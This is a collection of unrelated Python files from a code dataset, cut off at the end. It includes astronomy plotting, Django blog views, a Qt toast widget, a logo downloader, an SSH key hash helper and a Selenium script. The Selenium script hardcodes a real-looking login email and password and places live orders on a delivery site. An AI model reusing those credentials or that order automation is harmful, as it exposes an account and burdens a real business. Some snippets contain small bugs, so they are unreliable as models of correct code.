plt.contour(np.log10(pratio), levels=levs, linestyles='-', extent=dextent, colors='k')\n plt.xlabel('g-band detection map S/N')\n plt.ylabel('r-band detection map S/N')\n plt.axhline(0, color='k', alpha=0.2)\n plt.axvline(0, color='k', alpha=0.2)\n xx = np.array([0,100])\n for sed,c in seds:\n plt.plot(xx * sed[0], xx * sed[1], '-', color=c, alpha=0.5, lw=3)\n plt.axis('square');\n\nplt.clf()\ncontour_plot(p_bg, p_fg_a, [(sed_red, 'r')])\naxa = [-5.5,11, -5.5,11]\nplt.axis(axa)\nplt.savefig('prob-contours-a.pdf')\n\nplt.clf()\nrel_contour_plot(pratio_a, [(sed_red, 'r')])\nplt.axis(axa)\nplt.savefig('prob-rel-a.pdf')\n\npratio_b = 0.49 * pratio_red + 0.49 * pratio_flat + 0.02 * pratio_ronly\np_fg_b = p_bg * pratio_b\n\nplt.clf()\nplotseds = [(sed_red, 'r'), (sed_flat, 'b'), (sed_ronly, 'm')]\ncontour_plot(p_bg, p_fg_b, plotseds)\nplt.axis(axa)\nplt.savefig('prob-contours-b.pdf')\n\nplt.clf()\nrel_contour_plot(pratio_b, plotseds)\nplt.axis(axa)\nplt.savefig('prob-rel-b.pdf')\n\n######\n\n#sed_red2 = np.array([1., 2.5])\nsed_red2 = sed_red * 2\n\npratio_red2 = get_pratio(d_j, sig_j, sed_red2)\npratio_c = pratio_red2\np_fg_c = p_bg * pratio_c\n\n# plt.clf()\n# contour_plot(p_bg, p_fg_c, [(sed_red2, 'r')])\n# axa = [-5.5,11, -5.5,11]\n# plt.axis(axa)\n# plt.savefig('prob-contours-c.pdf')\n\n\nplt.clf()\ncontour_plot(p_fg_a, p_fg_c, [(sed_red2, 'r')],\n style1=dict(colors='b', linestyles='-'),\n style2=dict(colors='r', linestyles='--'),\n label1='Foreground model, faint luminosity function',\n label2='Foreground model, bright luminosity function')\naxa = [-5.5,11, -5.5,11]\nplt.axis(axa)\nplt.savefig('prob-contours-c.pdf')\n\n\nsed_red3 = sed_red\npratio_red3 = get_pratio(d_j, sig_j, sed_red3, alpha=0.5)\npratio_d = pratio_red3\np_fg_d = p_bg * pratio_d\nplt.clf()\ncontour_plot(p_fg_a, p_fg_c, [(sed_red2, 'r')],\n style1=dict(colors='b', linestyles='-'),\n style2=dict(colors='r', linestyles='--'),\n label1='Foreground model',\n label2='Foreground model, s * 2')\naxa = [-5.5,11, -5.5,11]\nplt.axis(axa)\nplt.savefig('prob-contours-d.pdf')\n\n\nsed_1a = np.array([1.])\nsed_1b = np.array([2.])\n\nd_one = np.linspace(-10, +30, 500)\nsig_one = np.array([1.])\np_bg_one = 1./np.prod(np.sqrt(2.*np.pi)*sig_one) * np.exp(-0.5 * (d_one / sig_one)**2)\n\npratio_1a = get_pratio(d_one, sig_one, sed_1a)\np_fg_1a = p_bg_one * pratio_1a\npratio_1b = get_pratio(d_one, sig_one, sed_1b)\np_fg_1b = p_bg_one * pratio_1b\n\n#sed_1c = np.array([1.])\n#pratio_1c = get_pratio(d_one, sig_one, sed_1c, alpha=0.5)\n#p_fg_1c = p_bg_one * pratio_1c\n\n# plt.clf()\n# plt.plot(d_one, p_bg_one, 'k-', lw=3, alpha=0.3, label='Background model')\n# plt.plot(d_one, p_fg_1a[0,:], 'b-', label='Foreground model')\n# #plt.plot(d_one, np.exp(-d_one), 'b--')\n# plt.plot(d_one, p_fg_1b[0,:], 'r--', label='Foreground model, s * 2')\n# #plt.plot(d_one, np.exp(-d_one/4.), 'r--')\n# #plt.ylim(0, p_bg_one.max())\n# plt.axvline(0., color='k', alpha=0.1)\n# plt.axhline(0., color='k', alpha=0.1)\n# plt.xlim(-4,12)\n# plt.legend()\n# plt.yticks(np.arange(0, 0.41, 0.1))\n# plt.xlabel('Detection map values')\n# plt.ylabel('Probability')\n# plt.savefig('prob-1a.pdf')\n# \n# flux_1a = d_one / sed_1a\n# flux_1b = d_one / sed_1b\n# ia = np.argmax(p_fg_1a)\n# ib = np.argmax(p_fg_1b)\n# plt.clf()\n# plt.plot(flux_1a, p_fg_1a[0,:], 'b-', label='Foreground model')\n# plt.plot(flux_1b, p_fg_1b[0,:] * sed_1b, 'r--', label='Foreground model, s * 2')\n# plt.axvline(flux_1a[ia], color='b', alpha=0.1)\n# plt.axvline(flux_1b[ib], color='r', alpha=0.1)\n# plt.axvline(0., color='k', alpha=0.1)\n# plt.axhline(0., color='k', alpha=0.1)\n# plt.legend()\n# plt.xlabel('Flux (implied by detection map)')\n# plt.ylabel('Probability')\n# plt.xlim(-4,8)\n# plt.savefig('prob-1b.pdf')\n\n\nflux_1a = d_one / sed_1a\nflux_1b = d_one / sed_1b\n\nprior1a = np.exp(-flux_1a) * (flux_1a > 0)\nprior1b = np.exp(-flux_1b) * (flux_1b > 0)\n\nplt.clf()\n#plt.subplots_adjust(hspace=0)\nplt.subplots_adjust(hspace=0.2)\n\n#ax1 = plt.subplot2grid((3,1), (0, 0), rowspan=2)\nax1 = plt.subplot2grid((2,1), (1, 0))\nplt.plot(d_one, p_bg_one, 'k-', lw=3, alpha=0.3, label='Background model')\nplt.plot(d_one, p_fg_1a[0,:], 'b-', label='Faint luminosity function') #'Foreground model, faint luminosity function')\nplt.plot(d_one, p_fg_1b[0,:], 'r--', label='Bright luminosity function') #'Foreground model, bright luminosity function')\n#plt.plot(d_one, p_fg_1c[0,:], 'g:', label='Foreground model, alpha = 0.5')\nplt.axvline(0., color='k', alpha=0.1)\nplt.axhline(0., color='k', alpha=0.1)\nplt.xlim(-4,8)\n#plt.yticks(np.arange(0, 0.41, 0.1))\nplt.yticks(np.arange(0, 0.41, 0.2))\nplt.xlabel('Observed flux ($\\sigma$)')\n#plt.xlabel('Observed flux (arb. units)')\n#plt.xticks([])\nplt.legend()\nplt.ylabel('Posterior Probability')\n\n#ax2 = plt.subplot2grid((3,1), (2, 0))\nax2 = plt.subplot2grid((2,1), (0, 0))\nplt.plot(d_one, prior1a, 'b-', label='Faint luminosity function') #'Foreground prior')\n# /2 to normalize (~ d_d / d_flux)\nplt.plot(d_one, prior1b/2., 'r--', label='Bright luminosity function') #Foreground prior, s * 2')\nplt.axhline(0., color='k', alpha=0.1)\nplt.axvline(0., color='k', alpha=0.1)\nplt.xlim(-4,8)\nplt.yticks([0, 0.5, 1.0])\nplt.ylabel('Prior probability')\nplt.xlabel('Prior flux (arb. units)')\nplt.xticks([])\n#plt.xlabel('Detection map values')\nplt.legend()\nplt.savefig('prob-1d.pdf')\n","sub_path":"bayes-figure.py","file_name":"bayes-figure.py","file_ext":"py","file_size_in_byte":8589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"70352366","text":"from selenium import webdriver\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\nfrom selenium.webdriver.common.keys import Keys\nfrom time import sleep\nfrom selenium.common.exceptions import NoSuchElementException\nimport random\n\nfirefox_profile = webdriver.FirefoxProfile()\nfirefox_profile.set_preference(\"general.useragent.override\",\n \"Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0\")\n\nfirefox_capabilities = webdriver.DesiredCapabilities.FIREFOX\nfirefox_capabilities['marionette'] = True\nfirefox_capabilities['binary'] = r\"C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe\"\n\nbinary = FirefoxBinary(r\"C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe\")\n\n\nclass BasicTestCases:\n def driver_ini(self):\n driver = webdriver.Firefox()\n self.driver = driver\n driver.maximize_window()\n self.driver.get('https://bgmenu.com')\n\n def login_test(self):\n login_button = self.driver.find_element_by_css_selector(\"#user-nav > ul > li:nth-child(2) > a\")\n login_button.click()\n sleep(2)\n email_input = self.driver.find_element_by_css_selector(\"#email\")\n email_input.send_keys(\"m.ivanov@oliviera.ro\")\n pass_input = self.driver.find_element_by_css_selector(\"#password\")\n pass_input.send_keys(\"testtest\")\n login_submit = self.driver.find_element_by_css_selector(\"#submit-btn\")\n login_submit.click()\n\n def make_order_test(self):\n for i in range(3):\n address_field = self.driver.find_element_by_css_selector(\n \"#main-search > div > div.input-hold.neighbourhood > input\")\n address_field.clear()\n streets = \"Бул България 111\"\n address_field.send_keys(streets)\n sleep(2)\n address_field.send_keys(Keys.ARROW_DOWN)\n sleep(2)\n address_field.send_keys(Keys.ENTER)\n sleep(2)\n address_field.send_keys(Keys.ENTER)\n sleep(2)\n search_restaurant = self.driver.find_element_by_css_selector(\"#search\")\n search_restaurant.send_keys(\"Annette\")\n search_restaurant.send_keys(Keys.ENTER)\n selected_restaurant = self.driver.find_element_by_css_selector(\n \"#result-list > li > div.place-info > div.place-header-wrapper > a > h2\")\n selected_restaurant.click()\n meal_add = self.driver.find_element_by_css_selector(\n \"#meal-2242 > form > div.item-details > div.item-add-to-car > a\")\n meal_add.click()\n sleep(4)\n\n try:\n continue_order = self.driver.find_element_by_css_selector(\n \"#general_popup_content > div.text-center > a.green_btn.continue-add-to-cart\")\n continue_order.click()\n sleep(3)\n meal_add.click()\n meal_add.click()\n except NoSuchElementException:\n sleep(2)\n meal_add.click()\n meal_add.click()\n\n sleep(3)\n order_input = self.driver.find_element_by_css_selector(\n \"#container > section.page_content.clearfix > div:nth-child(4) > aside > div > section > a\")\n order_input.click()\n sleep(3)\n address_selector = self.driver.find_element_by_css_selector(\"#address_id\")\n sleep(3)\n\n try:\n self.driver.find_element_by_css_selector(\n \"#cart-detiles-cont > div:nth-child(2) > div > div > div.address-not-supported > span\")\n address_selector.click()\n address_selector.send_keys(Keys.ARROW_DOWN)\n address_selector.send_keys(Keys.ENTER)\n sleep(3)\n add_comment = self.driver.find_element_by_css_selector(\n \"#cart-detiles-cont > div.main-content-ordered > div:nth-child(2) > div.leave-comment > label > span\")\n add_comment.click()\n comment_field = self.driver.find_element_by_css_selector(\"#order-comment\")\n comment_field.clear()\n comment_field.send_keys(\"BGMENU ТЕСТ! НЕ ПРИГОТВЯЙТЕ!\")\n order_submit = self.driver.find_element_by_css_selector(\n \"#cart-detiles-cont > div.main-content-ordered > div.row > div.col-md-3 > a\")\n order_submit.click()\n except NoSuchElementException:\n sleep(3)\n add_comment = self.driver.find_element_by_css_selector(\n \"#cart-detiles-cont > div.main-content-ordered > div:nth-child(2) > div.leave-comment > label > span\")\n add_comment.click()\n comment_field = self.driver.find_element_by_css_selector(\"#order-comment\")\n comment_field.clear()\n comment_field.send_keys(\"BGMENU ТЕСТ! НЕ ПРИГОТВЯЙТЕ!\")\n order_submit = self.driver.find_element_by_css_selector(\n \"#cart-detiles-cont > div.main-content-ordered > div.row > div.col-md-3 > a\")\n order_submit.click()\n\n sleep(2)\n\n '''try:\n self.driver.find_element_by_css_selector(\"#cart-detiles-cont > div:nth-child(3) > div > div > span > span\")\n self.driver.find_element_by_css_selector(\"#cart-detiles-cont > div:nth-child(3) > div > div > div:nth-child(3) > label\").click()\n sleep(2)\n self.driver.find_element_by_css_selector(\"#cart-detiles-cont > div:nth-child(3) > div > div > div:nth-child(1) > label\").click()\n sleep(2)\n order_submit.click()\n sleep(3)\n except NoSuchElementException:\n order_submit.click()\n sleep(2)'''\n self.driver.find_element_by_css_selector(\"#logo\").click()\n sleep(2)\n\n\nweb = BasicTestCases\nweb.driver_ini(web)\nweb.login_test(web)\nweb.make_order_test(web)\n","sub_path":"firefox_test.py","file_name":"firefox_test.py","file_ext":"py","file_size_in_byte":6026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"593503330","text":"from django.conf.urls import patterns, include, url\n\nfrom articles import views\n\nurlpatterns = patterns('',\n\t#articles\n url(\n\t r'^articles/$',\n\t\tviews.ArticlesListAPIView.as_view(),\n name='article-list',\n ),\n url(\n\t r'^articles/(?P[0-9]+)/$',\n views.ArticleDetailAPIView.as_view(),\n name='article-detail',\n ),\n #comments\n url(\n\t r'^articles/(?P[0-9]+)/comments/$',\n views.CommentListAPIView.as_view(),\n\t\tname='comment-list',\n ),\n url(\n\t r'^articles/(?P[0-9]+)/comments/(?P[0-9]+)/$',\n views.CommentDetailAPIView.as_view(),\n name='comment-detail',\n ),\n url(\n\t r'^users/(?P[0-9]+)/$',\n views.UserDetailAPIView.as_view(),\n name='user-detail',\n ),\n url(\n\t r'^users/(?P[0-9]+)/articles/$',\n views.ArticleForUserListApiView.as_view(),\n ),\n)\n\nurlpatterns += patterns('',\n url(\n\t r'^api-auth/',\n include('rest_framework.urls', namespace='rest_framework'),\n )\n)\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"project/articles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"595974503","text":"# encoding=utf8\nimport requests\nimport shutil\nimport xml.dom.minidom as minidom\n\nxmlfile='bel.xml'\nxml=minidom.parse(xmlfile)\nitems=xml.getElementsByTagName('C')\nfor s in items:\n\ttry:\n\t\tconv=[]\n\t\tid_=s.attributes['id'].value\n\n\t\tname=s.attributes['n'].value\n\t\tfor letter in name:\n\t\t\tletter.encode('ascii','ignore')\n\t\t\tconv.append(letter)\n\t\t\n\t\timgname=xmlfile[4:7]+\"_\"+unicode(''.join(conv))+\"_\"+id_\n\n\t\tr=requests.get('http://smimgs.com/images/logos/clubs/'+str(id_)+\".jpg\",stream=True)\n\n\t\tif r.status_code==200:\n\t\t\twith open(str(imgname),'wb') as f:\n\t\t\t\tr.raw.decode_content=True\n\t\t\t\tshutil.copyfileobj(r.raw,f)\n\texcept Exception as e:\n\t\tfile_ = open(\"lost_club_logos.txt\",\"a\")\n\t\tfile_.write(xmlfile[4:7]+\"_\"+id_) \n\t\tfile_.write(\"\\n\") \n\t\tfile_.close()\n\t\tpass\n","sub_path":"xp.py","file_name":"xp.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"116576954","text":"from django.urls import path\r\nfrom . import views #어떤 view를 제공할 것인지\r\n\r\napp_name = 'blog'\r\n\r\nurlpatterns = [\r\n\r\n path('index/',views.index,name='index'), #마지막에 / 안쓰면 안됨\r\n path('create/',views.create,name='create'), #create는 parameter 넘겨주지 않아도 된다.\r\n path('/update/',views.update,name='update'),\r\n path('/delete/',views.delete,name='delete'),\r\n path('/',views.detail,name='detail'), #detail은 따로 url 없이\r\n path('/comment/',views.add_comment_to_post,name='add_comment_to_post'), #detail은 따로 url 없이\r\n\r\n]\r\n","sub_path":"ch3/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"650511335","text":"filename_i = input(\"入力ファイル名(拡張子は不要):\")\n\nprint(filename_i + \".txtを読み込んでいます... \")\nf = open(filename_i + \".txt\", \"r\")\nlines = f.readlines()\norgdata = []\nfor i in lines:\n orgdata.append(list(map(float, i.split())))\nf.close()\nsize_org = len(orgdata)\nprint(\"読込完了 (\", size_org, \"行)\")\n\nout=str(\"\\n\")\nout+=(\"DEF TS3 TimeSensor{\\n\")\nout+=(\" cycleInterval 10\\n\")\nout+=(\" loop FALSE\\n\")\nout+=(\"}\\n\")\nout+=(\"DEF PI2 PositionInterpolator{\\n\")\nout+=(\" key[\")\n\nfor i in range(size_org):\n out+=(str(i/size_org)+\",\")\nout+=(\"1]\\n\")\nout+=(\" keyValue[\")\n\nfor i in range(size_org):\n print(\"\\r\",i,end=\" \")\n out += str(orgdata[i][0])+\" \"\n out += str(orgdata[i][1])+\" \"\n out += str(orgdata[i][2])+\",\"\n\nout+=(\"]\\n\")\nout+=(\"}\\n\")\nout+=(\"ROUTE TS3.fraction_changed TO PI2.set_fraction\\n\")\nout+=(\"ROUTE PI2.value_changed TO UFO.translation\\n\")\nf=open(\"UFO.wrl\",mode=\"a\")\nf.write(out)\nf.close()\nprint(\"UFO.wrl に追記しました\")","sub_path":"dev/s_test/VRML/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"386951861","text":"#! /usr/bin/python\n\nfrom subprocess import check_output\nimport os\nimport sys\nimport argparse\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Obtain md5 hash from id_rsa.pub')\n parser.add_argument('-f','--file',help='Full path to id_rsa.pub. E.g. //id_rsa.pub', required=True)\n args = vars(parser.parse_args())\n fpath = args['file']\n fs = fpath\n key = None\n fopen = None\n for f in fs:\n try:\n fopen = fpath\n except:\n pass\n finally:\n if (fopen == None):\n sys.stderr.write('No ssh key found at this location')\n sys.exit(1)\n md5_output = check_output(['ssh-keygen','-E','md5','-lf',fopen])\n start_point = md5_output.index(':')\n md5_output = md5_output[start_point+1:md5_output.index(' ',start_point+1)]\n sys.stdout.write(md5_output)\n sys.exit(0)\n","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"345069901","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nModule that contains toast widget implementation\n\"\"\"\n\nfrom __future__ import print_function, division, absolute_import\n\nfrom Qt.QtCore import *\nfrom Qt.QtWidgets import *\nfrom Qt.QtGui import *\n\nimport tpDcc as tp\nfrom tpDcc.libs.qt.core import base, mixin, animation, theme\nfrom tpDcc.libs.qt.widgets import label, avatar, loading\n\n\n@mixin.theme_mixin\nclass BaseToast(base.BaseWidget, object):\n\n class ToastTypes(object):\n INFO = 'info'\n SUCCESS = 'success'\n WARNING = 'warning'\n ERROR = 'error'\n LOADING = 'loading'\n\n DEFAULT_CONFIG = {'duration': 2}\n\n toastClosed = Signal()\n\n def __init__(self, text, duration=None, toast_type=None, parent=None):\n self._text = text\n self._duration = duration\n self._toast_type = toast_type\n self._parent = parent\n super(BaseToast, self).__init__(parent=parent)\n\n def get_main_layout(self):\n main_layout = QVBoxLayout()\n main_layout.setContentsMargins(0, 0, 0, 0)\n\n return main_layout\n\n def ui(self):\n super(BaseToast, self).ui()\n\n self.setWindowFlags(Qt.FramelessWindowHint | Qt.Dialog | Qt.WA_TranslucentBackground | Qt.WA_DeleteOnClose)\n self.setAttribute(Qt.WA_StyledBackground)\n self.setFixedSize(QSize(120, 120))\n\n icon_layout = QHBoxLayout()\n icon_layout.addStretch()\n\n widget_theme = self.theme()\n\n if self._toast_type == self.ToastTypes.LOADING:\n icon_layout.addWidget(loading.CircleLoading(size=widget_theme.huge, color=widget_theme.text_color_inverse))\n else:\n icon_label = avatar.Avatar()\n icon_label.theme_size = 60\n icon_label.image = tp.ResourcesMgr().pixmap(\n self._toast_type or self.ToastTypes.INFO, color=widget_theme.text_color_inverse)\n icon_layout.addWidget(icon_label)\n icon_layout.addStretch()\n\n content_label = label.BaseLabel()\n content_label.setText(self._text or '')\n content_label.setAlignment(Qt.AlignCenter)\n\n self.main_layout.addStretch()\n self.main_layout.addLayout(icon_layout)\n self.main_layout.addSpacing(10)\n self.main_layout.addWidget(content_label)\n self.main_layout.addStretch()\n\n close_timer = QTimer(self)\n close_timer.setSingleShot(True)\n close_timer.timeout.connect(self.close)\n close_timer.timeout.connect(self.toastClosed.emit)\n close_timer.setInterval((self._duration or self.DEFAULT_CONFIG.get('duration', 2)) * 1000)\n\n anim_timer = QTimer(self)\n anim_timer.timeout.connect(self._fade_out)\n anim_timer.setInterval((self._duration or self.DEFAULT_CONFIG.get('duration', 2)) * 1000 - 300)\n\n self._opacity_anim = QPropertyAnimation()\n self._opacity_anim.setTargetObject(self)\n self._opacity_anim.setDuration(300)\n self._opacity_anim.setEasingCurve(QEasingCurve.OutCubic)\n self._opacity_anim.setPropertyName('windowOpacity')\n self._opacity_anim.setStartValue(0.0)\n self._opacity_anim.setEndValue(0.9)\n\n close_timer.start()\n anim_timer.start()\n\n self._get_center_position(self._parent)\n self._fade_in()\n\n @classmethod\n def info(cls, text, parent, duration=None):\n inst = cls(text, duration=duration, toast_type=cls.ToastTypes.INFO, parent=parent)\n inst.show()\n\n return inst\n\n @classmethod\n def success(cls, text, parent, duration=None):\n inst = cls(text, duration=duration, toast_type=cls.ToastTypes.SUCCESS, parent=parent)\n inst.show()\n\n return inst\n\n @classmethod\n def warning(cls, text, parent, duration=None):\n inst = cls(text, duration=duration, toast_type=cls.ToastTypes.WARNING, parent=parent)\n inst.show()\n\n return inst\n\n @classmethod\n def error(cls, text, parent, duration=None):\n inst = cls(text, duration=duration, toast_type=cls.ToastTypes.ERROR, parent=parent)\n inst.show()\n\n return inst\n\n @classmethod\n def loading(cls, text, parent, duration=None):\n inst = cls(text, duration=duration, toast_type=cls.ToastTypes.LOADING, parent=parent)\n inst.show()\n\n return inst\n\n @classmethod\n def config(cls, duration):\n if duration is not None:\n cls.DEFAULT_CONFIG['duration'] = duration\n\n def _fade_out(self):\n self._opacity_anim.setDirection(QAbstractAnimation.Backward)\n self._opacity_anim.start()\n\n def _fade_in(self):\n self._opacity_anim.start()\n\n def _get_center_position(self, parent):\n parent_parent = parent.parent()\n dcc_win = tp.Dcc.get_main_window()\n if dcc_win:\n dcc_window = parent_parent == dcc_win or parent_parent.objectName() == dcc_win.objectName()\n else:\n dcc_window = None\n parent_geo = parent.geometry()\n pos = parent_geo.topLeft() if dcc_window else parent.mapToGlobal(parent_geo.topLeft())\n offset = 0\n for child in parent.children():\n if isinstance(child, BaseToast) and child.isVisible():\n offset = max(offset, child.y())\n target_x = pos.x() + parent_geo.width() / 2 - self.width() / 2\n target_y = pos.y() + parent_geo.height() / 2 - self.height() / 2\n self.setProperty('pos', QPoint(target_x, target_y))\n\n\nclass ToastWidget(QLabel, object):\n \"\"\"\n Toast widget used to show quick messages to user\n \"\"\"\n\n DEFAULT_DURATION = 500\n DEFAULT_PADDING = 30\n\n def __init__(self, *args):\n super(ToastWidget, self).__init__(*args)\n\n self._timer = QTimer(self)\n self._timer.setSingleShot(True)\n self._timer.timeout.connect(self._on_fade_out)\n\n self._duration = self.DEFAULT_DURATION\n\n self.setMouseTracking(True)\n self.setAlignment(Qt.AlignCenter)\n self.setAttribute(Qt.WA_TransparentForMouseEvents)\n\n if self.parent():\n self.parent().installEventFilter(self)\n\n # def eventFilter(self, obj, event):\n # \"\"\"\n # Overrides base QLabel eventFilter function\n # Updates the geometry when the parent widget changes size\n # :param obj: QWidget\n # :param event: QEvent\n # \"\"\"\n #\n # if event.type() == QEvent.Resize:\n # self.updateGeometry()\n # return super(ToastWidget, self).eventFilter(obj, event)\n\n def updateGeometry(self):\n \"\"\"\n Overrides base QLabel updateGeometry function\n Updates and aligns the geometry to the parent widget\n \"\"\"\n\n padding = self.DEFAULT_PADDING\n widget = self.parent()\n\n width = self.text_width() + padding\n height = self.text_height() + padding\n x = widget.width() * 0.5 - width * 0.5\n y = (widget.height() - height) / 1.2\n\n self.setGeometry(x, y, width, height)\n\n def setText(self, *args, **kwargs):\n \"\"\"\n Overrides base QLabel setText function\n Updates the size depending on the text width\n :param text: str\n \"\"\"\n\n super(ToastWidget, self).setText(*args, **kwargs)\n self.updateGeometry()\n\n def show(self):\n \"\"\"\n Overrides base QLabel show function\n Starts the timer to hide the toast\n \"\"\"\n\n duration = self.duration()\n self._timer.stop()\n self._timer.start(duration)\n if not self.isVisible():\n animation.fade_in_widget(self, duration=0)\n super(ToastWidget, self).show()\n\n def duration(self):\n \"\"\"\n Returns duration\n :return: int\n \"\"\"\n\n return self._duration\n\n def set_duration(self, duration):\n \"\"\"\n Sets how long to show the toast (in milliseconds)\n :param duration: int\n \"\"\"\n\n self._duration = duration\n\n def text_rect(self):\n \"\"\"\n Returns the bounding box rect for the text\n :return: QRect\n \"\"\"\n\n text = self.text()\n font = self.font()\n metrics = QFontMetricsF(font)\n\n return metrics.boundingRect(text)\n\n def text_width(self):\n \"\"\"\n Returns the width of the text\n :return: int\n \"\"\"\n\n text_width = self.text_rect().width()\n return max(0, text_width)\n\n def text_height(self):\n \"\"\"\n Returns the height of the text\n :return: int\n \"\"\"\n\n text_height = self.text_rect().height()\n return max(0, text_height)\n\n def _on_fade_out(self, duration=250):\n \"\"\"\n Internal callback function that fades out the toast message\n :param duration: int\n \"\"\"\n\n animation.fade_out_widget(self, duration=duration, on_finished=self.hide)\n","sub_path":"tpDcc/libs/qt/widgets/toast.py","file_name":"toast.py","file_ext":"py","file_size_in_byte":8773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"363874105","text":"\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import *\nfrom django.views.generic.base import View\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom django.views.generic import ListView\nfrom pure_pagination.mixins import PaginationMixin\n# from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom pure_pagination import Paginator, EmptyPage, PageNotAnInteger\nfrom django.db.models import Q\n\nfrom comments.models import Comment\nfrom comments.forms import CommentForm\nfrom .forms import PostModelForm\nfrom .models import Post\nfrom .utils import count_words, get_read_time\n\n\nclass posts_listView(View):\n def get(self, request):\n queryset_list = Post.objects.active()\n query = request.GET.get('q')\n if query:\n queryset_list = queryset_list.filter(\n Q(title__icontains=query) |\n Q(content__icontains=query) |\n Q(user__username=query) |\n Q(user__first_name__icontains=query) |\n Q(user__last_name__icontains=query)\n ).distinct()\n paginator = Paginator(queryset_list, 3) # Show 5 per page\n page = request.GET.get('page', 1)\n try:\n queryset = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n queryset = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n queryset = paginator.page(paginator.num_pages)\n context = {\n 'object_list': queryset\n }\n return render(request, \"post_list.html\", context)\n\n\nclass posts_detailView(View):\n def get(self, request, slug):\n instance = get_object_or_404(Post, slug=slug)\n initial_data = {\n \"content_type\": instance.get_content_type,\n \"object_id\": instance.id\n }\n comments = instance.comments\n comment_form = CommentForm(initial=initial_data)\n\n context = {\n 'instance': instance,\n 'comments': comments,\n 'comment_form': comment_form\n }\n return render(request, \"post_detail.html\", context)\n\n # 用于评论提交的处理(新增)\n def post(self, request, slug):\n instance = get_object_or_404(Post, slug=slug)\n form = CommentForm(request.POST)\n if form.is_valid():\n c_type = form.cleaned_data.get(\"content_type\")\n # 獲取某個app的model的记录(通过content_type.model_class()可直接获得那个model)\n content_type = ContentType.objects.get(app_label='posts', model=c_type)\n obj_id = form.cleaned_data.get(\"object_id\")\n content_data = form.cleaned_data.get(\"content\")\n parent_obj = None\n try:\n parent_id = int(request.POST.get(\"parent_id\"))\n except:\n parent_id = None\n\n if parent_id:\n parent_obj = Comment.objects.get(id=parent_id)\n\n new_comment, created = Comment.objects.get_or_create(\n user=request.user,\n content_type=content_type,\n object_id=obj_id,\n content=content_data,\n parent=parent_obj,\n )\n return HttpResponseRedirect(new_comment.content_object.get_absolute_url())\n return render(request, \"post_detail.html\", {})\n\n\nclass posts_createView(View):\n\n def get(self, request):\n postform = PostModelForm()\n return render(request, \"post_form.html\", {\"form\": postform})\n\n def post(self, request):\n if request.user.is_staff or request.user.is_superuser:\n postform = PostModelForm(request.POST, request.FILES)\n if postform.is_valid():\n postform.save()\n return redirect(\"posts:list\")\n else:\n return render(request, \"post_form.html\", {\"form\": postform})\n else:\n raise Http404\n\n\nclass posts_updateView(View):\n def get(self, request, slug):\n instance = get_object_or_404(Post, slug=slug)\n form = PostModelForm(instance=instance)\n return render(request, \"post_form.html\", {\"form\": form, \"instance\": instance})\n\n def post(self, request, slug):\n instance = get_object_or_404(Post, slug=slug)\n form = PostModelForm(request.POST, request.FILES, instance=instance)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(instance.get_absolute_url())\n else:\n return render(request, \"post_form.html\", {\"form\": form})\n\n\nclass posts_deleteView(View):\n def get(self, request, slug):\n instance = get_object_or_404(Post, slug=slug)\n instance.delete()\n return redirect(\"posts:list\")\n\n\n","sub_path":"blog/posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"125923029","text":"import argparse\nimport hashlib\nimport os\nimport re\nimport snowflake.connector\nimport sys\nimport time\n\n# Set a few global variables here\n_snowchange_version = '2.1.0'\n_metadata_database_name = 'METADATA'\n_metadata_schema_name = 'SNOWCHANGE'\n_metadata_table_name = 'CHANGE_HISTORY'\n\n\ndef snowchange(root_folder, snowfl_acct_type, change_history_table_override, autocommit, verbose):\n root_folder = os.path.abspath(root_folder)\n if not os.path.isdir(root_folder):\n raise ValueError(\"Invalid root folder: %s\" % root_folder)\n\n print(\"snowchange version: %s\" % _snowchange_version)\n print(\"Using root folder %s\" % root_folder)\n\n os.environ[\"SNOWFLAKE_AUTHENTICATOR\"] = 'snowflake'\n\n scripts_skipped = 0\n scripts_applied = 0\n\n # Get the change history table details\n change_history_table = get_change_history_table_details(change_history_table_override)\n\n # Create the change history table (and containing objects) if it don't exist.\n create_change_history_table_if_missing(snowfl_acct_type, change_history_table, autocommit, verbose)\n print(\"Using change history table %s.%s.%s\" % (\n change_history_table['database_name'], change_history_table['schema_name'], change_history_table['table_name']))\n\n # Find the max published version\n # TODO: Figure out how to directly SELECT the max value\n # from Snowflake with a SQL version of the sorted_alphanumeric() logic\n max_published_version = ''\n change_history = fetch_change_history(snowfl_acct_type, change_history_table, autocommit, verbose)\n if change_history:\n change_history_sorted = sorted_alphanumeric(change_history)\n max_published_version = change_history_sorted[-1]\n max_published_version_display 